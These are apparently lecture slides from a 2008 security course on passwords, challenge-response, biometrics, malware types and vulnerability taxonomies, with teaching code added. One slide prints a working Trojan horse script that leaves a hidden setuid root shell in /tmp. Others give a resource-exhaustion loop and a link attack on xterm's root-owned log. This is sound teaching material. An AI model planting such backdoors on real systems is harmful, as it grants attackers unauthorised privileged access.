Lecture 1 - University of Pittsburgh


IS 2150 / TEL 2810
Introduction to Security
James Joshi
Associate Professor, SIS
Lecture 9
Nov 25, 2008
Authentication, Identity
Malicious Code,
Vulnerability Analysis
1
Objectives

Understand/explain the issues related to, and utilize the techniques of:
- Authentication and identification
- Malicious code
  - What it is and how it works
- Vulnerability analysis/classification
  - Techniques
  - Taxonomies
2
Authentication and Identity
3
What is Authentication?

Authentication:
- Binding of an identity (of an external entity) to a subject
- How do we do it?
  - Entity knows something (secret): passwords, id numbers
  - Entity has something: badge, smart card
  - Entity is something: biometrics (fingerprints or retinal characteristics)
  - Entity is in someplace: source IP, restricted-area terminal
4
Authentication System:
Definition

- A: set of authentication information
  - used by entities to prove their identities (e.g., a password)
- C: set of complementary information
  - used by the system to validate authentication information (e.g., a
    hash of the password, or the password itself)
- F: set of complementation functions (to generate C)
  - f: A → C
  - generates the appropriate c ∈ C given a ∈ A
- L: set of authentication functions
  - l: A × C → { true, false }
  - verifies identity
- S: set of selection functions
  - generate/alter A and C
  - e.g., commands to change a password
5
Authentication System:
Passwords


Example: plaintext passwords
- A = C = alphabet*
- f returns its argument: f(a) = a
- l is string equivalence: l(a, b) is true if a = b

Complementation function
- Null (returns the argument, as above)
  - requires that c be protected; i.e., the password file must be protected
- One-way hash: a function such that
  - the complementary information c = f(a) is easy to compute
  - f⁻¹(c) is difficult to compute
6
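The definitions above can be sketched in a few lines of Python. SHA-256 stands in here for the one-way complementation function f; the slides do not prescribe a particular hash.

```python
import hashlib

def f(a: str) -> str:
    """Complementation function f: A -> C (a one-way hash)."""
    return hashlib.sha256(a.encode()).hexdigest()

def l(a: str, c: str) -> bool:
    """Authentication function l: A x C -> {true, false}."""
    return f(a) == c

# The system stores only c = f(a); recovering a would require inverting f.
stored_c = f("correct horse")
print(l("correct horse", stored_c))  # True
print(l("wrong guess", stored_c))    # False
```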
Passwords

Example: original Unix
- A password is up to eight characters
  - each character can be one of 127 possible characters
  - A contains approximately 6.9 × 10^16 passwords
- The password is hashed, using one of 4096 functions, into an
  11-character string
  - 2 characters are prepended to indicate the hash function used
- C contains passwords of 13 characters, each character from an
  alphabet of 64 characters
  - approximately 3.0 × 10^23 strings
- Stored in the file /etc/passwd (readable by all)
7
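The two sizes quoted above can be checked by direct counting. (The slide's 6.9 × 10^16 is a round figure; summing lengths 1 through 8 exactly comes out near 6.8 × 10^16.)

```python
# |A|: passwords of length 1 through 8 over a 127-character alphabet
size_A = sum(127 ** k for k in range(1, 9))

# |C|: 13-character strings over a 64-character alphabet
size_C = 64 ** 13

print(f"|A| = {size_A:.2e}")   # about 6.8e16
print(f"|C| = {size_C:.2e}")   # about 3.0e23
```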
Authentication System


Goal: identify the entities correctly

Approaches to protecting the system:
- Hide enough information so that one of a, c, or f cannot be found
  - Make C readable only by root
  - Make F unknown
- Prevent access to the authentication functions L
  - e.g., root cannot log in over the network
8
Attacks on Passwords

Dictionary attack: trial-and-error guessing
- Type 1: attacker knows A, f, c
  - Guess g and compute f(g) for each f in F
- Type 2: attacker knows A, l
  - Succeeds when l returns true for a guess g

Countering: difficulty depends on |A| and on time
- Let P be the probability of breaking in within time T, and G the
  number of guesses that can be tested in one time unit
- Then |A| ≥ TG/P (Anderson's formula)
- Assumptions: G is constant over time; all passwords are equally likely
9
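Plugging illustrative numbers into the bound |A| ≥ TG/P (Anderson's formula): the guess rate, time window, and probability below are assumptions chosen for the example, not values from the slides.

```python
# Anderson's formula: to keep the probability of a break-in within
# time T below P, the password space must satisfy |A| >= T*G / P.
G = 1e5                  # guesses testable per second (illustrative)
T = 365 * 24 * 3600      # attack window: one year, in seconds
P = 0.001                # acceptable break-in probability

min_A = T * G / P
print(f"|A| must be at least {min_A:.1e}")

# Smallest password length n over a 96-symbol alphabet with 96**n >= |A|
n = 1
while 96 ** n < min_A:
    n += 1
print(f"-> at least {n} characters over 96 symbols")  # 8
```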
Password Selection

- Random
  - Depends on the quality of the random number generator and on the
    size of legal passwords
  - 8 random characters: humans can remember only about one
- Pronounceable nonsense
  - Based on units of sound (phonemes)
  - Easier to remember
- User selection (proactive selection)
  - Controls on allowable passwords, e.g.:
    - at least 1 digit, 1 letter, 1 punctuation mark, 1 control character
    - an obscure poem verse
10
Password Selection

Reusable passwords are susceptible to dictionary attack (type 1)

Salting can be used to increase the effort needed:
- Makes the choice of complementation function a function of randomly
  selected data
- The random data is different for each user
- The authentication function is chosen on the basis of the salt
- Many Unix systems:
  - a salt is randomly chosen from 0..4095
  - the complementation function depends on the salt
11
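A minimal sketch of salting in Python. SHA-256 with the salt mixed into the input stands in for the salt-dependent DES variant that classic Unix actually used; the point is that identical passwords now produce different stored values.

```python
import hashlib, os

def complement(salt: bytes, password: str) -> str:
    """Salt-dependent complementation function: c = f_salt(a)."""
    return hashlib.sha256(salt + password.encode()).hexdigest()

def enroll(password: str):
    salt = os.urandom(8)            # random data, different for each user
    return salt, complement(salt, password)

def check(password: str, salt: bytes, stored: str) -> bool:
    return complement(salt, password) == stored

salt_a, c_a = enroll("hunter2")
salt_b, c_b = enroll("hunter2")
print(c_a != c_b)                   # same password, different stored values
print(check("hunter2", salt_a, c_a))
```

Salting does not slow a guess against one account, but it prevents one precomputed dictionary from being reused against every account at once.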
Password Selection

Password aging
- Change the password after some time, based on the expected time to
  guess a password
- Disallow changes to any of the previous n passwords

The fundamental problem is reusability:
- A replay attack is easy
- Solution: authenticate in such a way that the transmitted password
  changes each time
12
Authentication Systems:
Challenge-Response

Pass algorithm
- The authenticator sends a message m
- The subject responds with f(m)
  - f is a secret encryption function
- Example: ask for a second input based on some algorithm
13
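A sketch of the pass-algorithm idea. HMAC-SHA-256 plays the role of the shared secret function f here (the slides leave f abstract); the secret itself never crosses the wire, only f(m) for a fresh challenge m.

```python
import hmac, hashlib, os

SECRET = b"shared-secret-key"   # known to both parties (illustrative)

def f(m: bytes) -> str:
    """The secret function applied to the challenge."""
    return hmac.new(SECRET, m, hashlib.sha256).hexdigest()

# Authenticator side: send a fresh random challenge
challenge = os.urandom(16)

# Subject side: respond with f(challenge)
response = f(challenge)

# Authenticator side: recompute and compare in constant time
print(hmac.compare_digest(response, f(challenge)))  # True
```

Because the challenge is fresh each time, replaying an old response fails; this is exactly the fix for the reusability problem noted above.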
Authentication Systems:
Challenge-Response


One-time password: invalidated after use
- f changes after each use

S/Key uses a hash function h (MD4/MD5):
- The user chooses an initial seed k
- The key generator calculates
  k1 = h(k), k2 = h(k1), …, kn = h(kn-1)
- Passwords are used in the reverse order:
  p1 = kn, p2 = kn-1, …, pn = k1
- Suppose p1 = kn is intercepted; the next password is p2 = kn-1.
  Since h(kn-1) = kn, the attacker would need to invert h to
  determine the next password.
14
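The chain above, sketched in Python with SHA-256 in place of MD4/MD5 (a substitution for the sake of a modern standard-library hash):

```python
import hashlib

def h(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()

def skey_chain(seed: bytes, n: int) -> list:
    """k1 = h(seed), k2 = h(k1), ..., kn = h(k_{n-1})."""
    ks, k = [], seed
    for _ in range(n):
        k = h(k)
        ks.append(k)
    return ks

n = 5
ks = skey_chain(b"initial seed k", n)
passwords = list(reversed(ks))       # p1 = kn, p2 = k_{n-1}, ..., pn = k1

# Server side: remember the last accepted password; a new password p
# is valid iff h(p) equals it.  Intercepting `last` does not reveal
# the next p, since that would require inverting h.
last = passwords[0]                  # assume the server was seeded with p1 = kn
for p in passwords[1:]:
    assert h(p) == last
    last = p
print("chain verified")
```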
Authentication Systems:
Biometrics

Used for identification of human subjects, based on physical
characteristics that are hard to copy:
- Fingerprint (optical scanning)
  - Cameras needed (bulky)
- Voice
  - Speaker verification (identity) or speech recognition (information content)
- Iris/retina patterns (unique for each person)
  - Laser beaming is intrusive
- Face recognition
  - Variation in facial features can make this difficult
- Keystroke interval/timing/pressure
15
Attacks on Biometrics

- Fake biometrics
  - a fingerprint "mask"
  - a copied keystroke pattern
- Fake the interaction between the device and the system
  - Replay attack
- Countering these requires careful design of the entire
  authentication system
16
Malicious Code
17
What is Malicious Code?

A set of instructions that causes a security policy to be violated
- An unintentional mistake? Being tricked into it?
- "Unwanted" code
- Generally relies on "legal" operations
  - An authorized user could perform the operations without violating
    the policy
  - Malicious code "mimics" the authorized user
18
Types of Malicious Code

- Trojan horse
  - What is it?
- Virus
  - What is it?
- Worm
  - What is it?
19
Trojan Horse

A program with an overt (expected) and a covert (unexpected) effect
- Appears normal/expected
- The covert effect violates the security policy

The user is tricked into executing the Trojan horse
- Expects (and sees) the overt behavior
- The covert effect is performed with the user's authorization

A Trojan horse may replicate
- Create a copy on execution
- Spread to other users/systems
20
Example




Perpetrator:

cat >/homes/victim/ls <<'eof'
cp /bin/sh /tmp/.xxsh
chmod u+s,o+x /tmp/.xxsh
rm ./ls
ls $*
eof

(quoting 'eof' keeps $* from being expanded while the script is written)

Victim:

ls

What happens?
How to replicate this?
21
Virus

Self-replicating code
- A freely propagating Trojan horse
  - though some disagree that it is a Trojan horse
- Inserts itself into another file
  - Alters normal code to an "infected" version

Operates when the infected code is executed:

if spread-condition then
    for each target file:
        if not infected then alter to include virus
perform malicious action
execute normal program
22
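The pseudocode above, rendered as a harmless Python simulation: "infection" here just prepends a marker line to .txt files in a scratch directory, so no real executables are touched.

```python
import os, tempfile

MARKER = "# infected\n"

def infect_directory(path: str) -> int:
    """Simulate the virus loop: for each target, if not infected, alter it."""
    count = 0
    for name in os.listdir(path):
        if not name.endswith(".txt"):
            continue                      # "target files" only
        full = os.path.join(path, name)
        with open(full) as fh:
            body = fh.read()
        if body.startswith(MARKER):       # already infected: skip
            continue
        with open(full, "w") as fh:       # alter to include the "virus"
            fh.write(MARKER + body)
        count += 1
    return count

scratch = tempfile.mkdtemp()
for i in range(3):
    with open(os.path.join(scratch, f"doc{i}.txt"), "w") as fh:
        fh.write("hello\n")

print(infect_directory(scratch))  # 3 newly "infected"
print(infect_directory(scratch))  # 0 -- already infected
```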
Virus Types

- Boot sector infectors (e.g., the Brain virus)
  - Problem: how to ensure the virus "carrier" is executed?
  - Solution: place it in the boot sector of a disk
    - Runs on any boot
    - Propagates by altering boot disk creation
- Executable infectors
  - e.g., the Jerusalem virus (triggered on any Friday the 13th, but
    not in 1987)
- Multipartite virus: boot sector infector + executable infector
23
Virus Types/Properties

- Terminate and Stay Resident (TSR)
  - Stays active in memory after the application completes
  - Allows infection of previously unknown files
- Stealth (an executable infector)
  - Conceals the infection
- Encrypted virus
  - Prevents a "signature" from being used to detect the virus
  - [deciphering routine, enciphered virus code, deciphering key]
- Polymorphism
  - Changes the virus code to something equivalent each time it
    propagates
24
Virus Types/Properties

Macro virus
- Composed of a sequence of instructions that is interpreted rather
  than executed directly
- The infected "executable" isn't machine code
  - Relies on something "executed" inside an application
  - Example: the Melissa virus infected Word 97/98 documents
- Otherwise has properties similar to other viruses
  - Architecture-independent
  - Application-dependent
25
Worms

Replicates itself from one computer to another
- Self-replicating: no user action required
  - Virus: the user performs a "normal" action
  - Trojan horse: the user is tricked into performing an action
- Communicates/spreads using standard protocols
26
Other forms of malicious logic

We've discussed how they propagate; but what do they do?
- Rabbits/bacteria
  - Exhaust system resources of some class
  - Denial of service; e.g., while(1) { mkdir x; chdir x }
- Logic bomb
  - Triggers on an external event (a date, an action)
  - Performs a system-damaging action, often related to the event
- Others?
27
We can't detect it: now what?
Detection

- Signature-based antivirus
  - Look for known patterns in malicious code
  - Great business model!
- Checksums (file integrity, e.g., Tripwire)
  - Maintain a record of the "good" version of each file
- Validate actions against a specification
  - Including intermediate results/actions
  - N-version programming: independent programs
    - a fault-tolerance approach (diversity)
28
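A minimal sketch of the checksum approach in the spirit of Tripwire (not Tripwire's actual format or database): record a hash of each known-good file, then flag any file whose current hash differs.

```python
import hashlib, os, tempfile

def digest(path: str) -> str:
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def baseline(paths):
    """Record hashes of the known-good versions."""
    return {p: digest(p) for p in paths}

def verify(db):
    """Return the files whose contents no longer match the baseline."""
    return [p for p, d in db.items() if digest(p) != d]

tmp = tempfile.mkdtemp()
target = os.path.join(tmp, "program")
with open(target, "w") as fh:
    fh.write("original code")

db = baseline([target])
print(verify(db))          # [] -- nothing modified yet

with open(target, "w") as fh:
    fh.write("infected code")
print(verify(db))          # [target path] -- modification detected
```

The baseline database itself must be protected (e.g., stored read-only offline), or the malicious code can simply update the recorded hashes.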
Detection

- Proof-carrying code
  - The code includes a proof of its correctness
  - At execution time, the proof is verified against the code
    - If the code has been modified, the proof fails
- Statistical methods
  - High/low number of files read or written
  - Unusual amount of data transferred
  - Abnormal usage of CPU time
29
Defense

Maintain a clear distinction between data and executables
- A virus must write to a program
  - Writing is allowed only to data
- It must execute to spread or act
  - Data is not allowed to execute
- An auditable action is required to change data into an executable
30
Defense

- Information flow control
  - Limits the spread of a virus
  - Problem: tracking information flow
- Least privilege
  - Programs run with the minimal privilege needed
31
Defense

- Sandbox / virtual machine
  - Run in a protected area
  - Libraries / system calls are replaced with a limited-privilege set
- Use multi-level security mechanisms
  - Place programs at the lowest level
  - Don't allow users to operate at that level
  - Prevents writes by malicious code
32
Vulnerability Analysis
33
Vulnerability Analysis

Vulnerability (security flaw): a specific failure of security
controls (procedures, technology, or management)
- Errors in code
- Human violators
- Mismatches between assumptions

Exploit: use of a vulnerability to violate a policy
Attacker: one who attempts to exploit a vulnerability
34
Techniques for Detecting
Vulnerabilities

- System verification
  - Determine preconditions and postconditions
  - Validate that the system ensures the postconditions given the
    preconditions
  - Can prove the absence of vulnerabilities
- Penetration testing
  - Start with system/environment characteristics
  - Try to find vulnerabilities
  - Cannot prove the absence of vulnerabilities
35
Types/layers of Penetration
Testing

- Black box (external attacker)
  - The external attacker has no knowledge of the target system
  - Attacks build on the human element (social engineering)
- System access provided (external attacker)
  - The red team is provided with limited access to the system
  - Goal: gain normal or elevated access
- Internal attacker
  - The red team is provided with authorized user access
  - Goal: elevate privilege / violate policy
36
Red Team Approach
Flaw Hypothesis Methodology:
1. Information gathering
   - Examine design, environment, and system functionality
2. Flaw hypothesis
   - Predict likely vulnerabilities
3. Flaw testing
   - Determine where vulnerabilities exist
   - If a flaw does not exist, refine the hypotheses with the new
     understanding and return to step 2
4. Flaw generalization
   - Attempt to broaden discovered flaws
5. Flaw elimination (often not included)
   - Suggest means to eliminate the flaw
37
Problems with
Penetration Testing

- Nonrigorous
  - Dependent on the insight (and whim) of the testers
  - No good way of evaluating when testing is "complete"
- How do we make it systematic?
  - Try all classes of likely flaws
  - But what are these? Vulnerability classification!
38
Vulnerability Classification

Goal: describe the spectrum of possible flaws
- Enables designs that avoid flaws
- Improves coverage of penetration testing
- Helps in designing/developing intrusion detection

How do we classify?
- By how they are exploited?
- By where they are found?
- By the nature of the vulnerability?
39
Example flaw: xterm log

xterm runs as root
- Generates a log file
- Appends to the log file if the file already exists
- Problem: ln /etc/passwd log_file

Solution?

if (access("log_file", W_OK) == 0) {
    if ((fd = open("log_file", O_WRONLY|O_APPEND)) < 0) {
        /* error handling */
    }
}

What can go wrong?
40
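What can go wrong: between the access() check and the open(), a local attacker can replace log_file with a link to /etc/passwd; a classic time-of-check-to-time-of-use (TOCTTOU) race. A Python sketch of the safer pattern: open first, then validate the descriptor you actually opened (O_NOFOLLOW and fstat are POSIX features; the filenames are illustrative).

```python
import os, stat, tempfile

def append_safely(path: str, data: bytes):
    """Open first, then validate the opened descriptor itself."""
    # O_NOFOLLOW refuses to open `path` if it is a symbolic link
    fd = os.open(path, os.O_WRONLY | os.O_APPEND | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)               # inspects the file we opened, not a name
        if not stat.S_ISREG(st.st_mode):
            raise RuntimeError("not a regular file")
        os.write(fd, data)
    finally:
        os.close(fd)

tmp = tempfile.mkdtemp()
log = os.path.join(tmp, "log_file")
open(log, "w").close()
append_safely(log, b"entry\n")
print(open(log, "rb").read())  # b'entry\n'
```

Note that O_NOFOLLOW guards only the final path component; the complete fix for a setuid program is to drop privileges before opening at all.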
Example: Finger Daemon
(exploited by Morris worm)

finger sends a name to fingerd
- fingerd allocates a 512-byte buffer on the stack
- It places the name in the buffer
- It retrieves the information (local finger) and returns it

Problem: if the name is longer than 512 bytes, it overwrites the
return address

Exploit: put code in the "name", and a pointer to that code in bytes
513 and beyond, overwriting the return address
41
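The overflow can be simulated with a flat bytearray standing in for the stack frame: a 512-byte name buffer followed by a saved return address (a deliberate simplification of a real frame layout).

```python
# Simulated stack frame: a 512-byte name buffer, then a 4-byte
# saved return address immediately after it.
frame = bytearray(516)
frame[512:516] = b"RETN"            # the saved return address

def place_name(name: bytes, bounded: bool):
    """Copy `name` into the buffer, with or without a bounds check."""
    data = name[:512] if bounded else name
    frame[0:len(data)] = data

long_name = b"A" * 512 + b"EVIL"    # 516 bytes: payload + fake return address

place_name(long_name, bounded=True)
print(bytes(frame[512:516]))        # b'RETN' -- return address intact

place_name(long_name, bounded=False)
print(bytes(frame[512:516]))        # b'EVIL' -- return address overwritten
```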
RISOS: Research Into Secure Operating Systems (7 classes)
1. Incomplete parameter validation
   - e.g., buffer overflow
2. Inconsistent parameter validation
   - Different routines with different formats for the same data
3. Implicit sharing of privileged / confidential data
   - The OS fails to isolate processes and users
4. Asynchronous validation / inadequate serialization
   - Race conditions and TOCTTOU flaws
5. Inadequate identification / authentication / authorization
   - Trojan horses; accounts without passwords
6. Violable prohibition / limit
   - Improper handling of bounds conditions (e.g., in memory allocation)
7. Exploitable logic error
   - Incorrect error handling, incorrect resource allocation, etc.
42
Protection Analysis Model
Classes

- Pattern-directed protection evaluation
  - A methodology for finding vulnerabilities
- Applied to several operating systems
  - Discovered previously unknown vulnerabilities
- Resulted in a two-level hierarchy of vulnerability classes
  - Ten classes in all
43
PA flaw classes
1. Improper protection domain initialization and enforcement
   a. domain: improper choice of initial protection domain
   b. exposed representations: improper isolation of implementation
      detail (covert channels)
   c. consistency of data over time: improper change
   d. naming: improper naming (two objects with the same name)
   e. residuals: improper deallocation or deletion
2. Improper validation (of operands, queue management dependencies)
3. Improper synchronization
   a. interrupted atomic operations: improper indivisibility
   b. serialization: improper sequencing
4. Improper choice of operand or operation (critical operator
   selection errors)
44
NRL Taxonomy

Three classification schemes:
- How did it enter (genesis)
- When was it "created" (time of introduction)
- Where is it (location)

Genesis, intentional branch:
- Intentional
  - Malicious
    - Trojan horse
      - Nonreplicating
      - Replicating
    - Trapdoor
    - Logic/time bomb
  - Nonmalicious
    - Covert channel
      - Storage
      - Timing
    - Other
45
NRL Taxonomy (Genesis), inadvertent branch:
- Inadvertent
  - Validation error (incomplete/inconsistent)
  - Domain error (including object re-use, residuals, and exposed
    representation errors)
  - Serialization/aliasing (including TOCTTOU errors)
  - Boundary condition violation (including resource exhaustion and
    violable constraint errors)
  - Other exploitable logic error
46
NRL Taxonomy:
Time
Time of introduction:
- Development
  - Requirements/specification/design
  - Source code
  - Object code
- Maintenance
- Operation
47
NRL Taxonomy:
Location
Location:
- Software
  - Operating system
    - System initialization
    - Memory management
    - Process management / scheduling
    - Device management
    - File management
    - Identification / authentication
    - Other / unknown
  - Support
    - Privileged utilities
    - Unprivileged utilities
  - Application
- Hardware
48
Aslam’s Model

Attempts to classify faults unambiguously
- Decision procedure to classify faults

Coding faults
- Synchronization errors
  - Timing windows
  - Improper serialization
- Condition validation errors
  - Bounds not checked
  - Access rights ignored
  - Input not validated
  - Authentication / identification failure

Emergent faults
- Configuration errors
  - Wrong install location
  - Wrong configuration information
  - Wrong permissions
- Environment faults
49
Common Vulnerabilities and
Exposures (cve.mitre.org)

Captures specific vulnerabilities
- Standard name
- Cross-references to CERT, etc.

Each entry has three parts:
- Unique ID
- Description
- References

Example:
- Name: CVE-1999-0965
- Description: Race condition in xterm allows local users to modify
  arbitrary files via the logging option.
- References: CERT:CA-93.17, XF:xterm
50